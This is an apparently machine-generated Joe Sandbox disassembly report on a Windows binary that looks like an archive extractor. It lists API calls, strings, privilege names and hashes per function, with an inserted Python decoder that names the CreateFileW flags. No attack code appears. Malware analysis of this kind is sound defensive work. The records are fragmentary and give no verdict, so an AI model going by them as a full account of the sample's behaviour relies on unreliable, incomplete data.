                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E580
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  APIs
                                                                  • SetEndOfFile.KERNELBASE(?,0045903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00459F0C
                                                                  Similarity
                                                                  • API ID: File
                                                                  • String ID:
                                                                  • API String ID: 749574446-0
                                                                  APIs
                                                                  • SetCurrentDirectoryW.KERNELBASE(?,0046AE72,C:\Users\user\Desktop,00000000,0049946A,00000006), ref: 0046AC08
                                                                  Similarity
                                                                  • API ID: CurrentDirectory
                                                                  • String ID:
                                                                  • API String ID: 1611563598-0
                                                                  APIs
                                                                  • CloseHandle.KERNELBASE(000000FF,?,?,004595D6,?,?,?,?,?,00482641,000000FF), ref: 0045963B
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID:
                                                                  • API String ID: 2962429428-0
                                                                  APIs
                                                                    • Part of subcall function 00451316: GetDlgItem.USER32(00000000,00003021), ref: 0045135A
                                                                    • Part of subcall function 00451316: SetWindowTextW.USER32(00000000,004835F4), ref: 00451370
                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0046C2B1
                                                                  • EndDialog.USER32(?,00000006), ref: 0046C2C4
                                                                  • GetDlgItem.USER32(?,0000006C), ref: 0046C2E0
                                                                  • SetFocus.USER32(00000000), ref: 0046C2E7
                                                                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 0046C321
                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0046C358
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0046C36E
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C38C
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C39C
                                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0046C3B8
                                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0046C3D4
                                                                  • _swprintf.LIBCMT ref: 0046C404
                                                                    • Part of subcall function 00454092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004540A5
                                                                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0046C417
                                                                  • FindClose.KERNEL32(00000000), ref: 0046C41E
                                                                  • _swprintf.LIBCMT ref: 0046C477
                                                                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 0046C48A
                                                                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0046C4A7
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0046C4C7
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C4D7
                                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0046C4F1
                                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0046C509
                                                                  • _swprintf.LIBCMT ref: 0046C535
                                                                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0046C548
                                                                  • _swprintf.LIBCMT ref: 0046C59C
                                                                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 0046C5AF
                                                                    • Part of subcall function 0046AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0046AF35
                                                                    • Part of subcall function 0046AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0048E72C,?,?), ref: 0046AF84
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                  • String ID: %s %s$%s %s %s$PF$REPLACEFILEDLG
                                                                  • API String ID: 797121971-1441439866
                                                                  • Opcode ID: 2df33c8dd315d4100952b283d8410bdaf8c48550b57989b29de1ba2eaee1e5ac
                                                                  • Instruction ID: a3c07281ea4a564e56426793584af8ac7027bd6027c80cf3e0b5e79d0e1ec6b1
                                                                  • Opcode Fuzzy Hash: 2df33c8dd315d4100952b283d8410bdaf8c48550b57989b29de1ba2eaee1e5ac
                                                                  • Instruction Fuzzy Hash: D891B772544344BBD2219FA5CC89FFB77ACEB45B05F00482AF685D6181E739A6048B6B
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00456FAA
                                                                  • _wcslen.LIBCMT ref: 00457013
                                                                  • _wcslen.LIBCMT ref: 00457084
                                                                    • Part of subcall function 00457A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00457AAB
                                                                    • Part of subcall function 00457A9C: GetLastError.KERNEL32 ref: 00457AF1
                                                                    • Part of subcall function 00457A9C: CloseHandle.KERNEL32(?), ref: 00457B00
                                                                    • Part of subcall function 0045A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0045977F,?,?,004595CF,?,?,?,?,?,00482641,000000FF), ref: 0045A1F1
                                                                    • Part of subcall function 0045A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0045977F,?,?,004595CF,?,?,?,?,?,00482641), ref: 0045A21F
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00457139
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00457155
                                                                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00457298
                                                                    • Part of subcall function 00459DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004573BC,?,?,?,00000000), ref: 00459DBC
                                                                    • Part of subcall function 00459DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00459E70
                                                                    • Part of subcall function 00459620: CloseHandle.KERNELBASE(000000FF,?,?,004595D6,?,?,?,?,?,00482641,000000FF), ref: 0045963B
                                                                    • Part of subcall function 0045A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0045A325,?,?,?,0045A175,?,00000001,00000000,?,?), ref: 0045A501
                                                                    • Part of subcall function 0045A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0045A325,?,?,?,0045A175,?,00000001,00000000,?,?), ref: 0045A532
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                  • API String ID: 3983180755-3508440684
                                                                  • Opcode ID: 9ea5ef673f2f60fef96af09ab1eea8f088986537ae1d1cb68c6ed3d1025cccd7
                                                                  • Instruction ID: 5890cc9bc8fcbf02f6aa799ca7babaa83018258ab778d1e34dec16ef4f77713a
                                                                  • Opcode Fuzzy Hash: 9ea5ef673f2f60fef96af09ab1eea8f088986537ae1d1cb68c6ed3d1025cccd7
                                                                  • Instruction Fuzzy Hash: 72C1E371904644AADB21DF75DC41BEFB3A8AF04705F00456FFD5AA3283D738AA48CB69
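The function record above shows two CreateFileW calls with raw hexadecimal arguments (40000000 / 00000001 / 00000080 at 00457139, and C0000000 / 00000003 / 02200000 at 00457298). The following decoder is an added example, not part of the Joe Sandbox report, that turns those call lines into the named Win32 constants so the open semantics can be read at a glance. The constant tables are the documented Win32 values; the two sample lines are copied from the API list of this record, and only the first seven comma-separated values are treated as CreateFileW parameters, since the sandbox prints additional stack content after them.

```python
import re

# Bit tables for the CreateFileW parameters that appear in the report's call
# lines. Values are the documented Win32 constants (partial tables; any bit not
# listed is reported back as a hex remainder rather than silently dropped).
ACCESS_BITS = {
    0x10000000: "GENERIC_ALL",
    0x20000000: "GENERIC_EXECUTE",
    0x40000000: "GENERIC_WRITE",
    0x80000000: "GENERIC_READ",
}
SHARE_BITS = {
    0x1: "FILE_SHARE_READ",
    0x2: "FILE_SHARE_WRITE",
    0x4: "FILE_SHARE_DELETE",
}
DISPOSITION = {
    1: "CREATE_NEW",
    2: "CREATE_ALWAYS",
    3: "OPEN_EXISTING",
    4: "OPEN_ALWAYS",
    5: "TRUNCATE_EXISTING",
}
FLAG_BITS = {
    0x00000001: "FILE_ATTRIBUTE_READONLY",
    0x00000002: "FILE_ATTRIBUTE_HIDDEN",
    0x00000004: "FILE_ATTRIBUTE_SYSTEM",
    0x00000020: "FILE_ATTRIBUTE_ARCHIVE",
    0x00000080: "FILE_ATTRIBUTE_NORMAL",
    0x00000100: "FILE_ATTRIBUTE_TEMPORARY",
    0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
    0x01000000: "FILE_FLAG_POSIX_SEMANTICS",
    0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
    0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
    0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN",
    0x10000000: "FILE_FLAG_RANDOM_ACCESS",
    0x20000000: "FILE_FLAG_NO_BUFFERING",
    0x40000000: "FILE_FLAG_OVERLAPPED",
    0x80000000: "FILE_FLAG_WRITE_THROUGH",
}

# Matches the report's "CreateFileW.KERNEL32(arg,arg,...), ref: ADDR" lines.
CALL_RE = re.compile(
    r"CreateFileW\.\w+\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# The two call lines quoted from the function record above.
REPORT_EXCERPT = """
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00457139
• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00457298
"""


def decode_bits(value, table):
    """Names of the set bits in `value` (ascending bit order) plus any unnamed remainder."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"0x{rest:08X}")
    return names


def decode_createfilew(line):
    """Decode one CreateFileW line from the report's API list; None if the line is not one.

    Parameter order is CreateFileW's: lpFileName, dwDesiredAccess, dwShareMode,
    lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile.
    A '?' means the sandbox could not resolve that value.
    """
    m = CALL_RE.search(line)
    if not m:
        return None
    raw = [a.strip() for a in m.group("args").split(",")][:7]
    raw += ["?"] * (7 - len(raw))

    def num(s):
        return None if s == "?" else int(s, 16)

    access, share, disp, flags = (num(raw[i]) for i in (1, 2, 4, 5))
    return {
        "ref": m.group("ref"),
        "filename_known": raw[0] != "?",
        "access": None if access is None else decode_bits(access, ACCESS_BITS),
        "share": None if share is None else decode_bits(share, SHARE_BITS),
        "disposition": None if disp is None else DISPOSITION.get(disp, f"0x{disp:X}"),
        "flags": None if flags is None else decode_bits(flags, FLAG_BITS),
    }


def decode_report(text):
    """Decode every CreateFileW line in a chunk of report text."""
    return [d for d in (decode_createfilew(line) for line in text.splitlines()) if d]


if __name__ == "__main__":
    for call in decode_report(REPORT_EXCERPT):
        print(call)
```

Read against the record: the call at 00457139 creates a new file (CREATE_NEW, FILE_ATTRIBUTE_NORMAL) for GENERIC_WRITE with a share mode of 0, i.e. exclusive; the call at 00457298 reopens an existing path for read and write with FILE_FLAG_BACKUP_SEMANTICS and FILE_FLAG_OPEN_REPARSE_POINT, which opens the reparse point itself rather than whatever it points to. Together with the SeRestorePrivilege, SeCreateSymbolicLinkPrivilege, UNC\ and \??\ strings listed for the same function, and the SetFileTime, SetFileAttributesW and DeleteFileW subcalls, those are the lines to check when assessing how this routine writes files and whether it follows links on the way.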
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: __floor_pentium4
                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                  • API String ID: 4168288129-2761157908
                                                                  • Opcode ID: 8d0a55ff3cd93ab85c7dd6a44df93d496d3611fe7dedf60330170aaf2df788bc
                                                                  • Instruction ID: e831df3166215195b4dfbe52bf45cafad8ff8dc4adff33c6bf1b71e8142b617e
                                                                  • Opcode Fuzzy Hash: 8d0a55ff3cd93ab85c7dd6a44df93d496d3611fe7dedf60330170aaf2df788bc
                                                                  • Instruction Fuzzy Hash: 2EC24D72E046288FDB25CE29DD407EAB7B5EB48304F1582EBD44DE7240E779AE818F45
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog_swprintf
                                                                  • String ID: CMT$h%u$hc%u
                                                                  • API String ID: 146138363-3282847064
                                                                  • Opcode ID: 63cedf8118257fb7b9314f71aae6455a93f7c2a2d00f50118d2b34c168f9b7fa
                                                                  • Instruction ID: 9a0a1d3932c622d989dcda8f3c33d477e6dffe58b400b45eafadad44cdbbf447
                                                                  • Opcode Fuzzy Hash: 63cedf8118257fb7b9314f71aae6455a93f7c2a2d00f50118d2b34c168f9b7fa
                                                                  • Instruction Fuzzy Hash: 8732D271500384AFDB15DF74C895AEA37A5AF15346F04047FFD8A8B283DA78AA4DCB24
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00452874
                                                                  • _strlen.LIBCMT ref: 00452E3F
                                                                    • Part of subcall function 004602BA: __EH_prolog.LIBCMT ref: 004602BF
                                                                    • Part of subcall function 00461B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0045BAE9,00000000,?,?,?,00010424), ref: 00461BA0
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00452F91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                  • String ID: CMT
                                                                  • API String ID: 1206968400-2756464174
                                                                  • Opcode ID: 83b3269b529b143345dc3c61215c5717196ec45fda04f2c14d14407da7d714f5
                                                                  • Instruction ID: c8b68036ed5eb9c834053e1c704020642402f5e6da1955a40dbfbb639f1bd9e7
                                                                  • Opcode Fuzzy Hash: 83b3269b529b143345dc3c61215c5717196ec45fda04f2c14d14407da7d714f5
                                                                  • Instruction Fuzzy Hash: 276204716003448FDB19DF34C9866EA37A1AF55305F08457FEC9A8B383DBB8A949CB64
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0046F844
                                                                  • IsDebuggerPresent.KERNEL32 ref: 0046F910
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0046F930
                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0046F93A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                  • String ID:
                                                                  • API String ID: 254469556-0
                                                                  • Opcode ID: e94708eed617247e014ca289a0b9b65c0022f7ac9b075295ce3e6b6789384d7a
                                                                  • Instruction ID: 2605258df5dbd633fe82e3c9b69721bdcdd5399a6c8d5f1b705ae0f071021ab9
                                                                  • Opcode Fuzzy Hash: e94708eed617247e014ca289a0b9b65c0022f7ac9b075295ce3e6b6789384d7a
                                                                  • Instruction Fuzzy Hash: BB312975D053199BDB20DFA4D9897CDBBB8AF08704F1040EAE44CAB250EB759B898F49
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(80000000,0046E5E8,0000001C,0046E7DD,00000000,?,?,?,?,?,?,?,0046E5E8,00000004,004B1CEC,0046E86D), ref: 0046E6B4
                                                                  • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0046E5E8,00000004,004B1CEC,0046E86D), ref: 0046E6CF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: InfoQuerySystemVirtual
                                                                  • String ID: D
                                                                  • API String ID: 401686933-2746444292
                                                                  • Opcode ID: 0ab2f32134a8b55687a069679a0a2da00933ff9eed30c06b4a5429a532f49663
                                                                  • Instruction ID: ce2b70a2af90457693f1218ef0ef19c5bb369a6759ff76476ee566ccfdae302f
                                                                  • Opcode Fuzzy Hash: 0ab2f32134a8b55687a069679a0a2da00933ff9eed30c06b4a5429a532f49663
                                                                  • Instruction Fuzzy Hash: 08017B766001086BCF14DE6ACC08BDE3BEAEFC4725F0CC125ED19DB240E638D9018784
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00478FB5
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00478FBF
                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00478FCC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                  • String ID:
                                                                  • API String ID: 3906539128-0
                                                                  • Opcode ID: dc2b34963398c50fb992ae913d6649d86a47fff8febbe20e2c0f76c6f538d6ea
                                                                  • Instruction ID: 9d55819cafea4ec738eef727db724227181d8b93d4925d321bd7c2ef58f1997f
                                                                  • Opcode Fuzzy Hash: dc2b34963398c50fb992ae913d6649d86a47fff8febbe20e2c0f76c6f538d6ea
                                                                  • Instruction Fuzzy Hash: 2B31D274941228ABCB21DF65DC88BDDBBB8AF08710F5041EAE41CA7250EB749F858F49
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .
                                                                  • API String ID: 0-248832578
                                                                  • Opcode ID: 278064454f00f9bb8f5ddf062015491d117cfa79fcdbf856f86ee17fee41a048
                                                                  • Instruction ID: 71ab39832d246c22a81275e0399769f6163740d659197711441b93e9b85dc5e7
                                                                  • Opcode Fuzzy Hash: 278064454f00f9bb8f5ddf062015491d117cfa79fcdbf856f86ee17fee41a048
                                                                  • Instruction Fuzzy Hash: D83126718002496FCB248E79CC84EFB7BBDDB81314F0481AEE81CD3252E7389E458B94
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                  • Instruction ID: 11965a0ec199381cb4b548be452a5d5e9108eb2a76103b208e160d334ead11cd
                                                                  • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                  • Instruction Fuzzy Hash: 95022D71E102199BDF18DFA9C9806EEB7F1EF88314F25816AD819E7384D734AD41CB94
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0046AF35
                                                                  • GetNumberFormatW.KERNEL32(00000400,00000000,?,0048E72C,?,?), ref: 0046AF84
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: FormatInfoLocaleNumber
                                                                  • String ID:
                                                                  • API String ID: 2169056816-0
                                                                  • Opcode ID: 942e517c0b31f46673363704ffe6981be12e9458fe6ea42aa2287097f71fa7e1
                                                                  • Instruction ID: c0139b842199d2d135bbeb399d7dc8b209e8bce439185763a8dfa1732f9de981
                                                                  • Opcode Fuzzy Hash: 942e517c0b31f46673363704ffe6981be12e9458fe6ea42aa2287097f71fa7e1
                                                                  • Instruction Fuzzy Hash: AA015E3A110308BAD7109FA5DC45F9F77B8EF19710F408436FA05A7150E37499188BA9
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00456DDF,00000000,00000400), ref: 00456C74
                                                                  • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00456C95
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
